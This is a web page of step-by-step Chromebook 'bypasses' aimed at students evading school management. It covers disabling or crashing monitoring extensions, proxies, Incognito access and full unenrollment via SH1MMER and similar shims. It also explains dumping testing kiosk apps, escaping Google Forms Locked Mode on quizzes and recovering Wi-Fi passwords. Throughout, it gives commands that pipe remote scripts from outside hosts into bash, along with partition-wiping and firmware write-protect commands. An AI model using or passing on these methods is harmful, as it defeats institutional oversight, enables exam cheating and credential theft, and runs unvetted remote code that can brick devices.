This page is for Google Chrome/Chrome OS bypasses
For Windows exploits, see Bypasser’s Windowskit
Most web-based exploits will work on other Chromium based browsers
proxy moment
Opens a proxy tab with about:blank cloaking.
Web-based exploit.
1: Make a bookmarklet with the link from xlak.github.io/alphabetic/ & run it.
2: Print the page (Ctrl+P), then cancel & click “try again”. A proxy tab will open.
1: Disable Wi-Fi.
2: Click "Sign in as Existing User".
3: Hold esc & click any app.
4: Click "Add Wi-Fi" & click any Wi-Fi.
5: Click "Diagnose" & go to Wi-Fi.
6: Click "Open in Settings", then close it.
7: Repeat step 2.
Requires Extension Dev Mode
Freezes extensions.
Web-based exploit.
1: Go to chrome://extensions & enable Extension Dev Mode.
2: Click on the background page of the extension you want to block, then "Network", "Disable Cache", & "No Throttling".
3: Go to Settings & click on the "Disable javascript" box. Keep this tab open.
4: Disable "No Throttling".
Requires access to DNS settings
Browse web from the sign-in screen.
Chrome OS-based exploit.
1: Sign out & click the settings button located at the top right of the Wi-Fi panel.
2: Set "Name servers" to "Custom name servers".
3: Set the first Custom name servers to 150.136.163.0.
You'll see a link on the normal sign-in screen that says "Visit this network's sign-in page".
4: Click on "Webview link for tests".
5: Click "Diagnose" & go to Wi-Fi.
Patched on Chrome OS 123+
Crashes extensions.
OS-based exploit.
1: Pin the extension you want to disable, sign out, disable Wi-Fi, & log back in.
2: Quickly enable Wi-Fi, open Chrome, & spam the pinned extension for ~30 seconds.
1: Get the code from xlak.github.io/chaos/ & paste it in a new tab.
2: Inspect the page that loads.
3: Click on “Console” at the top & paste the script in.
4: When an inspect window pops up, paste the script in again.
Requires powerwash.
Your extensions get corrupted & don't work.
Chrome OS-based exploit.
1: Powerwash your Chromebook.
2: Log into your Chromebook & immediately turn off Wi-Fi, then perform an instant restart (refresh+power).
3: Log back in & look for an option to log in as an existing user.
4: Go to chrome://extensions & turn on Wi-Fi.
5: Wait for your school’s blocking extension to appear. As soon as it does, turn off Wi-Fi & restart quickly.
6: Log back in, go back to extensions, & wait. If it says your blocking extension could be corrupted or doesn't appear at all, then it worked.
Memory leak unavoidable; patched on Chrome OS 135+
Disables extension with a memory leak.
Web-based exploit.
1: Go to chrome://extensions.
2: In a new tab, go to the settings page of the extension you want to disable.
3: In another tab, go here & click the “freeze extension button”.
4: Immediately switch back to chrome://extensions & spam the “allow access to file URLs” for a few seconds.
5: The extension is now disabled. You need to flip the switch a few times every couple of minutes, & you may need to reopen the Dextensify page every once in a while to prevent an unavoidable memory leak from crashing the system.
Patched on Chrome OS 135+
Allows toggling of forced extensions by printing iframes. Based off LTMEAT Print method.
Web-based exploit.
ExtPrint3r.mp4
1: Open this link.
2: Look for your blocker on the list. If it isn't there, toggle "show all extensions" in the settings.
3: Click disable & follow the directions on the popup window. You'll need to do it very quickly.
If the extension switches back on, increase the iframe slider in the settings.
Requires tab limit.
Crashes the admin's ability to remove tabs, though they can still see your screen.
Web-based exploit.
1: Create a bookmarklet with this code.
2: Spam click the bookmarklet while holding Ctrl.
3: If you’re asked to close the page, click no & prevent the page from making additional dialogues.
Requires chrome://net-internals access.
Bypasses extensions that also use a Chrome app. Hapara & iBoss are known to work.
Web-based exploit.
1: Go to chrome://net-internals & click the "Domain Security Policy" tab.
2: Insert 127.0.0.1 in the "Add HSTS domain’s Domain" textbox, then click "Add".
3: Repeat step 2, but use "localhost" instead of 127.0.0.1.
4: Restart your computer.
Patched on Chrome OS 82+
Allows you to enter Incognito mode.
Web-based exploit.
1: Enter your username & password, but don't sign in.
2: Press Alt+Shift+I & spam the "Privacy Policy" for ~30-60 seconds.
3: Login, quickly go to the Incognito tab, then press Ctrl+Shift+N.
4: Close the original Incognito tab.
5: If it continues to open policy pages, repeat Step 4.
127OSBlocksi;GoGuardian;Hapara;iBoss;Securelychrome://flagsIncognito 123-127
Patched on Chrome OS 127+
Allows you to enter Incognito mode.
Web-based exploit.
1: Enable the chrome://flags/#captive-portal-popup-window flag (v123-125)/chrome://flags/#temporary-unexpire-flags-m124 (v126)/chrome://flags/#temporary-unexpire-flags-m125 (v126-127) flag & restart. If the flag didn't reset, continue.
2: In Wi-Fi Settings, set Name Servers to Custom Name Servers & the first box to detectportal.firefox.com/captive.apple.com/150.136.163.0 (any one of these).
3: Click sign-in on the popup, then press Ctrl+T.
4: Revert the change to Name Servers.
Doesn’t work with Hapara Highlights & Read&Write; patched on Chrome OS 111+
Uses locked mode to disable extensions. Formerly called Locked Mode Hack.
Web-based exploit.
Methods using (B) & (C) are patched on Chrome OS 115+ while the rest are patched on Chrome OS 135+
Crashes an extension's manifest file.
Web-based exploit.
Note: LTMEAT disables all extensions, not just your blocker.
Template URL: chrome-extension://ID/manifest.json
Extension IDs (Chrome):
Blocksi: pgmjaihnmedpcdkjcgigocogcbffgkbn
ContentKeeper: jdogphakondfdmcanpapfahkdomaicfa
Cisco Umbrella: jcdhmojfecjfmbdpchihbeilohgnbdci
Fortiguard: igbgpehnbmhgdgjbhkkpedommgmfbeao
GoGuardian: haldlgldplgnggkjaafhelgiaglafanh
Hapara: kbohafcopfpigkjdimdcdgenlhkmhbnc
iBoss: kmffehbidlalibfeklaefnckpidbodff
LANSchool: baleiojnjpgeojohhhfbichcodgljmnj
Linewize: ddfbkhpmcdbciejenfcolaaiebnjcbfc
NetRef: khfdeghnhlpdfeenmdofgcbilkngngcp
Securly: joflmkccibkooplaeoinecjbmdebglab
Smoothwall: jbldkhfglmgeihlcaeliadhipokhocnm
If your blocker ID isn’t on this list, go to the extension page & copy the character string in the URL.
LTMEAT.mp4
1: Take the Template URL & replace "ID" with the extension ID. This is the extension's manifest page.
2: Go to the extension’s manifest page & bookmark it (A), as well as chrome://kill (B) & chrome://hang (C).
3: While on (A), click on (B).
4: Instantly start spamming (C) & reload.
WebBlocksi;GoGuardian;Hapara;iBoss;SecurelySwitch Method
1: While on (A), click on (B).
2: Duplicate the tab.
3: Go to the extension’s settings page.
4: Flip the "Allow access to file URLs" switch.
WebBlocksi;GoGuardian;Hapara;iBoss;SecurelyChat Method
1: Wait until your teacher opens the chat window.
2: Spam X until it stops opening.
3: Flip the “Allow access to file URLs” switch.
WebBlocksi;GoGuardian;Hapara;iBoss;SecurelyTemporary Method
1: Create a new bookmark folder (spam.js) & inside that folder, make 38 bookmarks of the page chrome-extension://id/background.js (you can do this easily with the bookmark manager).
2: Go to chrome://settings/performance & turn memory saver off. Under “Keep these sites always active”, add chrome-extension://id/background.js.
3: On a new tab, right click (spam.js) & click “open all (38)”. Repeat this step, then duplicate the rightmost page & go to your blocker’s extension page..
4: Flip the “Allow access to file URLs” switch & go to the leftmost tab. Right click it & select “Close tabs to the right”. Keep the remaining background.js tab open.
WebBlocksi;GoGuardian;Hapara;iBoss;SecurelySkid Method
1: Go to (A) & click on (C).
2: Duplicate the tab (right click on it & click “duplicate”).
3: Go to your blocker’s extension page & flip the “Allow access to file URLs” switch.
WebBlocksi;GoGuardian;Hapara;iBoss;SecurelyWeb Method
1: Go here & follow the instructions there.
WebBlocksi;GoGuardian;Hapara;iBoss;SecurelyWi-Fi Method
1: Go to your blocker's extension page.
2: Disable Wi-Fi.
3: Spam the “Allow access to file URLs” switch.
4: Enable Wi-Fi.
5: Spam pin your extension.
Requires bookmarklets; patched on Chrome OS 115+
Loads pages without extensions.
Web-based exploit.
1: Create a bookmarklet by dragging the box that says “Quickview Launcher” from here into the Bookmarks Bar.
2: On that same page, double click the opener.
3: On the newly opened tab, run the bookmarklet.
Patched on Chrome OS 129+
Allows you to do a ton of things (with the right permissions).
Web-based exploit.
Rigtools.mp4
1: Keep this website open in a new tab.
2: Open this website & go to Network.
3: Double-click the black/grey box.
4: Click "extension-ID" & find your the extension ID of the extension you want to disable, then paste it in. It should load a filesystem: page. You can have other extensions under it.
5: Run this code. Note it won't work if your extension's manifest file doesn't have the proper permissions.
Requires an extension with a textbox
Hangs extensions.
Web-based exploit.
1: Download the index.html & emoji files.
2: Insert the emoji file into the HTML file.
3: Click "Copy to Clipboard".
4: In a textbox from the extension you want to disable, do paste & after a second, do it again.
5: Immediately after, open a page related to the extension (such as the manifest file) & keep it open.
Requires a kiosk app; Most methods patched on version 119
Opens a window inside of a kiosk app, which has different permissions & extensions.
Chrome OS-based exploit.
Skiovox.mp4
1: In the login screen, turn off your Wi-Fi.
2: If you have a password, type it in but don’t press enter.
3: Click on a kiosk app & press Alt+Shift+S instantly.
4: Wait until you get a “network unavailable screen”.
5: On the toolbar, click accessibility & then the ?.
If you see a “back” button proceed to method A (steps A-B), otherwise go to method B (steps C-E) or method C (steps F-H).
Method A:
A: Click “add other Wi-Fi network” & immediately press Esc twice & Enter. If you get a screen saying “multi sign-in is disab;ed”, press Esc to bypass it.
B: There may be an open window belonging to your school profile, you can close it. In the window behind it that has no extensions, click the 3 dots & then click “new window”. Use this window instead. Go to steps 14+.
Method B:
C: Press the “diagnose” button.
D: Just click “add other Wi-Fi network”. This is inconsistent, try a few times with a few apps or use steps 11-13.
E: Click Wi-Fi, then the settings link. Close this window to reveal a Chrome window. Go to steps 14+.
Method C:
F: Just click “add other Wi-Fi network”.
G: Turn on text-to-speech (Ctrl+Alt+Z). Hold the Search key & press O, then T.
H: Click “resources” & one of the 3 links to open Chrome. Once your browser is open, you can turn text to speech off. Go to steps 14+.
This exploit has some problems that can be fixed by the Skiovox Helper. A ZIP file of the extension is available on the GitHub page as well as here.
6: Go to chrome://extensions & enable extension Dev Mode. Click “load unpacked” & in the select a file menu, right click the ZIP file you downloaded earlier, & click “extract all”. Select the newly extracted folder to install the extension.
Other notes:
Problems without Skiovox Helper:
-Unclear how to add an account/install extensions.
-Keyboard shortcuts are broken.
-It’s hard to remove or resize windows.
-Can’t view battery percentage or time.
The main difference between the results of method A (steps A-B) than method B (steps C-E) or method C (steps F-H) is method A can open multiple windows, while the others can’t.
If your screen keeps falling asleep every 5 seconds, try a different kiosk app.
Your files, bookmarks, & history won’t transfer over to the exploit & vice versa.
To exit the exploit, either hold down your power button & sign out or type chrome://quit in a new tab.
OSBlocksi;GoGuardian;Hapara;iBoss;SecurelyKiosk125/126 Method
1: Do the main methods steps 1-4.
2: Click the cog in the brightness settings instead.
3: Click on one of the links in Chromevox's Resources tab (Ctrl+Alt+Z), then disable it.
4: Click "Sign in as existing user" & login. If you don't see this, try a different kiosk app.
5: Press Esc on the "Multi user sign in disabled on this Chromebook" screen.
6: Turn on Wi-Fi & open a new window.
7: Go to main method steps 6+.
Note that any Incognito window is still monitored by your school.
Requires extension access.
Uses OneTab & European witch magic to unblock websites.
Web-based exploit.
1: Download the OneTab extension.
2: Click the "import" button in the extension's settings tab.
3: Add the URL you wish to visit ~100 times, then click "import".
4: Spam click the top link, then either spam Esc on one of the opened tabs or wait for one to load on an about:blank page.
Requires Name Servers.
I don't know man but it gets you an unblocked browser.
OS-based exploit.
1: Sign out & go to the Wi-Fi Settings.
2: Go to Name Servers & set it to "Custom Name Servers", then set at least 1 box to "52.207.185.90". If itdoesn't automatically save, reconnect 1-3 times.
3: If you see a "Network not available" page, click "Sign in as an existing user" & then back until you reach the login screen.
4: Underneath there should be a "Sign in with Google account" button. Click it & then "Forgot Email?".
5: It should now show a 400 error page, click the Google logo.
Requires access to DNS settings
Connects you to a proxy server.
Chrome OS-based exploit.
1: Open the DNS settings.
2: Select "custom name servers" & set all of the boxes to 0.0.0.0.
3: Wait 5 seconds, then change them to 150.136.6.90.
4: In Google, go here.
5: Reload the page (Ctrl+Shift+R), then go here on the same tab.
6: Click on the big red triangle in the middle of the page & type "thisisunsafe". If you fail, reload the page & repeat this step.
7: Repeat step one & select "automatic name servers".
Requires miniOS; patched on Chrome OS 133+
Chrome OS-based exploit.
BadApple.mp4
1: Enable Dev Mode (Esc+Power+Refresh, then Ctrl+D, even if blocked) & then reenter Recovery Mode.
2: Select "Internet Recovery" & reconnect to the same Wi-Fi network if needed.
3: When connected, press Ctrl+Alt+F3.
Requires a storage device, another PC; patched on Chrome OS 125+ & kernver 4+ & keyrolled devices
Chrome OS-based exploit.
BadRecovery.mp4
1: Check your kernver by entering Recovery Mode (Esc+Refresh+Power) & pressing Tab.
2: Look at the text in the top-left corner. If the number ends in 4+, your Chromebook is unsupported.
3: Download a bin from chrome100.dev.
4: Go here & upload it, then flash it.
5: Enter Recovery Mode (Esc+Refresh+Power). If you're using the unverified payload, you must also enter developer mode, & then enter recovery mode again. On Cr50 devices, you must NOT be in developer mode for unenrollment to work.
6: Insert the storage device.
Mode Operations:
about:blank
Allows you to run bookmarklets on privileged pages.
Web-based exploit.
Blank3r.mp4
1: Make a bookmarklet with this code.
2: Go to chrome://extensions & click on an extension.
3: Click “view in Chrome Web Store” & spam escape. If it loads into a blank screen, run the bookmarklet.
4: Keep this tab open.
AnyWebBlobe BM
Not compatable with every bookmarklet by design
Runs bookmarklets.
Web-based exploit.
1: Go to chrome://network#state.
2: Find the managed Wi-Fi under "Favorite Networks".
3: Click the "+" & copy all the text.
4: Go here & paste the test into the bar, then click "Download".
5: Go to chrome://network#general & import the ONC file.
Certain boards are incompatible (see here); patched on Chrome OS 132+ & keyrolled devices
Unenrolls your Chromebook.
OS-based exploit.
BR1CK.mp4
1: Powerwash (Esc+Power+Refresh then Ctrl+D) & return to Secure Mode.
2: Go to chrome://network#logs & check all boxes under the options section.
3: Place the combined-logs.tar.gz file in here. If you don't have access, the time will be ~1-1.5 seconds less than the time it takes to enroll.
4: Sign out & powerwash again, but use Ctrl+Alt+Shift+R instead.
5: When the "Enterprise Enrollment" screen appears, wait untul you're in the higher time range & perform an EC-Reset (Power+Refresh).
6: If you get a screen prompting you for recovery ("Chrome OS is missing or damaged" or "Something went wrong"), continue.
7: Preform SH1MMER (Legacy).
A: While you're here, disable the 5 minute Dev Mode wait.
8: Select Deprovision (D), then type "B" to open a bash shell.
9: Run this command: "gsctool -a -o" & press the power button when it spams "Press PP button now!".
10: Reenter Dev Mode, then when the "Enterprise Enrollment" screen shows up again enter Recovery Mode & boot into SH1MMER.
11: Run deprovision (D) & then reboot (E).
Has to be done for each Wi-Fi network; patched on Chrome OS 128+
Prevents your Chromebook from automatically updating.
Web-based exploit.
CAUB.mp4
1: Go to chrome://network#state & scroll to the bottom.
2: Click the "+" by the name of the Wi-Fi network.
3: Copy the whole page (Ctrl+A then Ctrl+C).
4: Go to caub.glitch.me & paste it into the text box.
5: Click "generate onc" & download the file.
6: Go to chrome://network#general & import the onc file.
127Webchrome://networkFlag Method
Requires chrome://flags access; patched on Chrome OS 128+
Chrome OS-based exploit.
1: Go to chrome://flags#show-metered-toggle & enable it.
2: Open Settings & go to Network >> Your Wi-Fi >> Advanced >> Show metered toggle & turn it on.
Requires Crosh, Dev Mode
Dump any kiosk app & then make it a regular Chrome OS app.
Chrome OS-based exploit.
ChrioskDumping.mp4
1: Enable Dev Mode, then add your home & then your school account.
2: Open Crosh (Crtl+Alt+T) & run "shell", then go to "/home/chronos/{user account hash}/extentions/kiosk/" & find the ID of the kiosk app you want to dump.
TestNav: mdmkkicfmmkgmpkmkdikhlbggogpicma
SecureTestBrowser: hblfbmjdaalalhifaajnnodlkiloengc
NWEA: omkghcboodpimaoimdkmigofhjcpmpeb
CollegeBoard: joaneffahikmmipmidpkeedopejmhbbm
3: Back it up to your downloads folder by running "cp /home/chronos/{user account hash}/extentions/kiosk/(app ID) /home/chronos/{user account ID hash}/Downloads/".
4: Go into the folder & edit the "manifest.json" file. Delete the "kiosk_only" : true" line.
5: Load the folder with Extension Dev Mode in chrome://extensions (click "Load Unpacked").
Requires a storage device, another PC; patched on kernver 3+ & keyrolled devices
Unenrolls your Chromebook, removing ALL restrictions.
Chrome OS-based exploit.
Cryptosmite.mp4
1: Check your kernver by entering Recovery Mode (Esc+Refresh+Power) & pressing Tab.
2: Look at the text in the top-left corner. If the number ends in 3+, your Chromebook is unsupported.
3: Downgrade to 118. If you're on a version before 118, stay on it.
4: Download an injected RMA Shim from here build your own.
5: Flash the injected RMA Shim onto a USB device.
6: Enter Dev Mode (Ctrl+D).
7: Reenter Recovery Mode & plug in the storage device.
8: Navigate to the Cryptosmite payload, press enter, then Y.
Might not work
Prevents your Chromebook from automatically updating by deleting the update partitions. Also blocks kernver updates.
OS-based exploit.
DAUB.mp4
1: Access a shell (via methods such as SH1MMER or BadApple):
2: Run the following (3rd will open a prompt):
cgpt add /dev/mmcblk0 -i 2 -P 10 -T 5 -S 1
yes | mkfs.ext4 /dev/mmcblk0p1
fdisk /dev/mmcblk0
d
4
{just press enter}
d
5
{just press enter}
w
Requires a storage device; extension access required; Mostly Limited
Downgrade your Chromebook.
Chrome OS-based exploit.
Downgration.mp4
1: Check your kernver by entering Recovery Mode (Esc+Refresh+Power) & pressing Tab.
2: Look at the text in the top-left corner. If the number ends in 0 or 1, your Chromebook can downgrade to any version. Otherwise, it's limited.
Minimum versions:
0/1: N/A
2: 112
3: 120
4: 125
5: 132
fwver 2 versions are 114+
3: Go to chrome://version & check your board (under platform).
4: Go to chrome100.dev & find your board (use Ctrl+F) or find the bins here.
5: Download the version of Chrome OS you want.
6: Install the Chromebook Recovery Utility extension & run it.
7: Plug in the storage device & follow the instructions.
8: On your Chromebook, enter Recovery Mode (Esc+Reload+Power) & follow the prompts.
9: Skip the "Checking for Updates" screen by pressing Ctrl+Shift+E.
Requires a storage device; patched on Chrome OS 130+ & keyrolled devices
Boots into an unenrolled Chrome OS environment.
Chrome OS-based exploit.
E-Halcyon.mp4
1: Download a Chrome OS 107 bin from chrome100.dev & inject it yourself or download one from here.
A: Open a terminal & run "git clone https://github.com/MercuryWorkshop/RecoMod", "cd RecoMod", "chmod +x recomod.sh", & "sudo ./recomod.sh -i /path/to/recovery/image.bin --halcyon --rw_legacy".
2: Flash it onto a storage device.
3: Enter Recovery Mode (Esc+Refresh+Power) & plug in the storage device.
4: Spam E until you get a 5 minute wait sequence, then spam E again near the end of it.
5: Navigate to "activate halycon enviroment" & press enter, then navigate to "install halycon semi-tethered". Navigate back to "activate halycon envirement" & select "Boot halycon semi-tethered".
You can no longer boot Chrome OS normally, & will have to use the storage device every time.
Doesn’t work with blocklist/banlist
Installs an extension without using the webstore.
Web-based exploit.
ExtensionLauncher.mp4
1: Make a bookmarklet with the code from here.
2: Go here & run the bookmarklet.
3: Find an extension you want to download.
4: Right-click the image to the left of the title & select "Copy image address". Paste the image address into the first bar.
5: Type the name of the extension into the second bar.
6: Copy the extension ID (string of random letters in the address bar). Paste it into the third bar.
7: Click "Download".
Visit the Extension Information page for information on some extensions.
AnyHardwareFirmware Write Protection
Disabling FWWP allows you to do many things, including flashing custom firmware (allowing for installation of Linux, Windows, etc.) & setting GBB flags.
The method to disable FWWP depends on your Chromebook, however if you've been on v114 or above you must use Pencil method. History of FWWP:
PreCr50: these old boards used either a screw, a jumper, or a switch on the motherboard & are some of the simplest out there. If you happen to be lucky enough, I recommend trying this.
Cr50: following this, a new chip was added known as the Cr50. Older Cr50 Chromebooks set FWWP to the battery sense line, while later ones require everybody's favorite Pencil method. You can also use Closed Case Debugging/SuzyQable on all of these, as long as you're unenrolled.
Ti50: the generation 2 Cr50 chip, better known as the Ti50, now verifies the RO portion of the fimware at boot, meaning you need to run a few commands to prevent bricking. Regardless of wether a Ti50 device supports another method, you must use CCD/SuztQable (unenrolled) or Pencil Sharpener (patched on v136).
AnyHardwareScrewdriverScrew; possibly patched on fimware 2+
Requires screwdriver
1: Turn your Chromebook off & unscrew the back cover.
2: Locate & use unscrew on the WP screw.
3: Screw the back cover back on.
AnyHardwareScrewdriverJumper
Requires screwdriver, bridger; possibly patched on fimware 2+
1: Turn your Chromebook off & unscrew the back cover.
2: Disconnect the internal battery cover.
3: Locate & bridge the area with for the WP jumper.
4: Reassemble the device.
AnyHardwareScrewdriverBattery
Requires screwdriver; possibly patched on fimware 2+
1: Turn your Chromebook off & unscrew the back cover.
2: Unplug the power cord connecting the battery & motherboard.
3: Run the nessesary commands. If you're on v136+ you should probably change device secret.
1: oh fuck no not yet
save device secret: vpd -i RO_VPD -l
change device secret: vpd -i RO_VPD -s stable_device_secret_DO_NOT_SHARE=$(openssl rand -hex 32)
AnyHardwareDebug CableClosed Case Debugging/SuzyQable
Requires Dev Mode, debug cable; doesn't work with active FWMP
1: Enter Dev Mode, then open the VT2 Shell (Ctrl+Alt+F2 on login screen).
2: Login as root & run "gsctool -a -o".
3: You will be prompted to press the physical presense (PP) button multiple times, on most devices this is the power button.
4: Upon completion, you will see the message "PP Done!" confirming CCD enabling. Return to Dev Mode & the VT2 shell.
5: Login as root again, plug in the debug cable & run "ls /dev/ttyUSB*"; this should return with ttyUSB0, ttyUSB1, & ttyUSB2 if the cable is correctly connected.
6: Run "echo "wp false" > /dev/ttyUSB0" & "echo "wp false atboot" > /dev/ttyUSB0" to disable WP, then run "echo "ccd reset factory" > /dev/ttyUSB0", which allows you to unbrick the device with CCD & also is required for Ti50 computers.
7: Run "gsctool -a -I" to verify the CDD is opened & factory values are set; it should all be currently set to "Y/Always".
8: Run "crossystem wpsw_cur" & verify it returns 0, then reboot.
Unbricking Ti50s: hold the power button, on Chromebooks press F2 twice or on Chromeboxes press the recovery pinhole instead, then release the power button & repeat.
GBB flags
Requires disabled FWWP
These allow you to edit certain things, such as the Dev Mode wait timer, disable FWMP (unenroll), force enable certain things such as USB booting, & more.
1: Go to the GBB Flaginator to easily set select flags to set.
2: Run "futility gbb -s --flash --flags=0x120b7" on newer devices & "/usr/share/vboot/bin/set_gbb_flags.sh 0x120b7" on older ones to set flags. You can read them with "futility gbb -g --flash --flags"/"/usr/share/vboot/bin/get_gbb_flags.sh" respectively.
Requires Dev Mode, FWWP disabled
Dekeyrolls your device. Not the same as firmware 2, the updated version of Chromebook firmware included in v114+
Chrome OS-based exploit.
1: Enter the VT2 shell (Ctrl+Alt+F2), then sign in as chronos & run "curl -LO https://raw.githubusercontent.com/Cruzy22k/Firmware2/main/firmware.sh && sudo bash firmware.sh".
125-129OS;UnenrollmentExternalPC;ExternalStorageDevice;Powerwash;RecoveryModeIcarus Lite
Requires a storage device, another PC; requires Chrome OS 125-129
Unenrolls devices with device management interception using a proxy & a custom Certificate Authority.
Both devices should be on the same Wi-Fi network.
DO NOT USE PUBLIC ICARUS PROXIES.
Chrome OS-based exploit.
IcarusLite.mp4
1: On an external PC, clone the repo with "git clone --recursive https://github.com/cosmicdevv/Icarus-Lite.git" & change directory to it (cd Icarus-Lite).
2: Set up the environment. You can either run the following commands or the exe.
Nonkeyrolled
A: Check your Chromebook's board in chrome://version, then download a prebuilt SH1MMER bin (with the Icarus payload) here.
B: Flash it to an external storage device, enable Dev Mode (Esc+Power+Refresh, then Ctrl+D, even if blocked), then boot the shim.
Keyrolled
A: Enable Dev Mode (Esc+Power+Refresh, then Ctrl+D, even if blocked) & then reenter Recovery Mode.
B: Select "Internet Recovery" & reconnect to the same Wi-Fi network if needed.
C: When connected, press Ctrl+Alt+F3 & run "bash <(curl -SLk http://ba.cosmion.xyz/script)".
3: Reboot into Verified Mode & do not click continue. Open up the Network Configuration instead (bottom right corner).
4: Set the connection type to "Manual" & the "Secure HTTP" options to those given earlier, then click "Save" & continue the setup process.
Only works on unenrolled Chromebooks; requires a storage device
Switches your kernver.
Chrome OS-based exploit.
KVS.mp4
1: Unenroll your Chromebook.
3: Download a KVS bin from here.
4: Flash it onto a storage device.
5: Enter Dev Mode.
6: Reenter Recovery Mode.
7: Follow the instructions on-screen.
Very buggy
Bypasses Google's Locked Mode.
Web-based exploit.
1: Open the locked form twice.
2: Click "Continue" on both at the exact same time. Using touchscreen will help a lot.
3: Click the Overview button (not Alt+Tab, that closes the quiz) on your keyboard.
Note you can't screenshot until the form has been submitted.
Requires Dev Mode
Spoofs Secure Mode with Dev Mode privileges. Continuation of Fakemurk.
OS-based exploit.
1: Enter Dev Mode (Esc+Power+Refresh; Ctrl+D) & the VT2 shell (Ctrl+Alt+F2).
2: Logn as root & run "bash <(curl -SLk https://bit.ly/murkmod)".
3: Install the helper extension (unzip the "helper" folder & load unpacked).
AnyOS;UnenrollmentExternalStorageDeviceSH1MMER
p class="small-text">Requires a storage device; patched on kernver 4+
Unenrolls your Chromebook, removing ALL restrictions.
Chrome OS-based exploit.
SH1MMER.mp4
1: Check your kernver by entering Recovery Mode (Esc+Refresh+Power) & pressing Tab.
2: Look at the text in the top-left corner. If the number ends in 4 or more, your Chromebook is unsupported.
3: Find your Chromebook’s board name by going to chrome://version. It will be behind “stable-channel”.
4: Download your board's RMA Shim at chrome100.dev & then inject the bin at Wax4Web, download an injected bin from here, or build one yourself.
Modern shims have a UI, while Legacy uses a commandline interface.
5: Flash the injected bin onto an external storage device.
6: Enter Recovery Mode (Esc+Refresh+Power when booting), then press Ctrl+D & then enter.
7: Reenter Recovery Mode, then plug your shimmed storage medium into your Chromebook.
8: On Legacy shims, play some Tetris. This is legally required.
9: Use the Cryptosmite payload, this is "S" on Legacy. The decryption key is "Info-58-immense!NickName_Arabia-710" on older Legacy shims.
10: Enable "MAC Address Randomization" in chrome://flags to cloak yourself.
Reenrollment
1: Enter Dev Mode, then press Esc+Power+Reload then Ctrl+D & then enter.
2: If you get a screen that says "You're already in Dev Mode", skip it by pressing Ctrl+D again.
3: Powerwash your Chromebook (Ctrl+Alt+Shift+R). If you just entered Dev Mode, you can skip this step.
4: Once you enter the Wi-Fi password, click the "Enterprise Enrollment" button & sign in with your school account.
5: Once you're on the normal district login screen, press Ctrl+Alt+F2.
6: Type "root" as the login & "test0000" as the password if needed.
7: Run the command "vpd -i RW_VPD -s check_enrollment=0", then press Ctrl+Alt+F1.
8: Once you're done, reboot your computer with Power+Refresh, then reunenroll.
Requires a storage device, Dev Mode; patched on keyrolled devices
Allows you to boot Linux or Chrome OS from an external storage device without modifying your Chromebook.
Chrome OS-based exploit.
Shimboot.mp4
1: Find your Chromebook’s board name by going to chrome://version, it will be behind “stable-channel”.
2: Get your Chromebook’s RMA shim from chrome100.dev & run the commands below or download a prebuilt one from here.
3: Flash it onto an external storage device.
4: Enable Dev Mode & then plug in the storage device & reenter Recovery Mode (Esc+Refresh+Power).
5: Boot into Linux & log in. The default is user/user.
6: Expand the rootfs partition so that it fills up the entire disk by running "sudo growpart /dev/sdX 4" (replacing sdX with the block device corresponding to your disk) to expand the partition, then run "sudo resize2fs /dev/sdX4" to expand the filesystem.
1: Get code execution in an extension. This extension will need to have the "tabs", "activeTab", & "browserAction" permissions as well as 'unsafe-eval' set in the CSP.
2: Enable the flag "#extensions-on-chrome-urls".
3: Get a bookmarklet & place it as follows: chrome.browserAction.onClicked.addListener(() => {chrome.tabs.executeScript(null, {code: `location.href="javascript:bookmarklet";`});});
4: Open the URL you want this code to run on & click the extension icon.
Requires extension Developer Mode
An extension that allows you to download other extensions.
Web-based exploit.
Skebstore.mp4
1: Download the folder from the GitHub page or here.
2: Go to chrome://extensions & enable extension Developer Mode.
3: Click "Load unpacked" & select the folder (unzip it if needed).
4: Click the extension to go to the Skebstore install page.
5: Insert an extension's ID & download it.
2: Enable the Snap&Read toolbar.
3: Enter any text into the outline topic's editable text area.
4: Click the bullet point of the topic.
5: Click the "Link to Source" option.
6: Click the "+" button at the bottom right.
7: Switch to the website tab.
8: In the Article/Page title input field, enter the name of your chosen bookmarklet.
9: Click "Save" & switch to the outline tab.
10: In the Snap&Read toolbar, click the "Hide Outlines" button.
Execution:
11: In the Snap&Read toolbar, click the "Show Outlines" button.
12: In your created outline, click the link separated by parenthesis that contains the bookmarklet.
13: Click the "Hide Outlines" button.
Requires the ability to view a page’s source code
Reconstructs a web page from its source code.
Web-based "exploit".
1: Go to a website & view its source code with Ctrl+U or by using the View Source bookmarklet.
2: Copy everything from the newly opened tab & paste it in a site like this.
Requires a CAUB'd Wi-Fi network
Find the Wi-Fi password for CAUB'd Wi-Fi networks.
Web-based exploit.
SIPE.mp4
1: CAUB the Wi-Fi network you want to get the password from.
2: Go here & type the name of the Wi-Fi network.
3: Click the majik (TM) button, it will tell you what you'll need to press in step 6.
4: Go to chrome://sync-internals/ in a new tab & click the "Search" tab.
5: Type "Wi-Fi_" in the textbox & click "Search".
6: Click the name of the Wi-Fi you got from step 3 & copy all the data. Note that it might be a longer string than what it says on SIPE.
7: Go back to SIPE & paste the data in the textbox, then click the majik button (TM).
Requires Sh0vel, Extension Dev Mode, Crosh; patched on Chrome OS 127+
Run scripts in Chrome pages.
Web-based exploit.
1: Enter a kiosk profile with SKIOVOX.
2: Download the ZIP from here.
3: Navigate to chrome://extensions & enable Extension Dev Mode, then load the extension.
4: Navigate to chrome-untrusted://crosh & run "vmc create-extra-disk --size=1 /home/chronos/user/MyFiles/Downloads/opener.txt". It should return "A raw disk is created at /home/chronos/user/MyFiles/Downloads/opener.txt."
5: Open a new tab. If the default New Tab page loads, install the SKIOVOX Helper extension in a new tab before proceeding.
6: Click the folder icon in the bottom right. The file manager should open. Navigate to "Downloads".
7: Open the opener.txt file. A new window should open with a blank page tab. This window is managed by your organization.
8: Open a new tab & close the blank page tab.
9: Navigate to chrome://extensions & open the details page of the extension you previously chose to install in your managed profile. Copy its extension ID.
10: Return to the regular window that is not managed by your organization.
11: Activate the Skiovox Breakout extension.
12: In the input field for the extension ID, enter the ID of the extension you previously chose to install in your managed profile.
13: Set the textarea text to the script you want to run.
14: Click Start injection.
Loading the Tr3nch Menu:
1: Navigate to chrome://flags & enable the "extensions-on-chrome-urls" flag.
2: Click "Restart" then navigate to chrome://os-settings, chrome://setttings, chrome://extensions, chrome://chrome-signin, chrome://inspect, chrome://file-manager, chrome://network, or chrome://oobe.
3: Click the extensions extension icon in the toolbar.
4: Click & activate the extension with the injected script. The Tr3nch menu should launch.
uBlock Origin exclusive
Unblocks bookmarklets. Older version of uRun.
Web-based exploit.
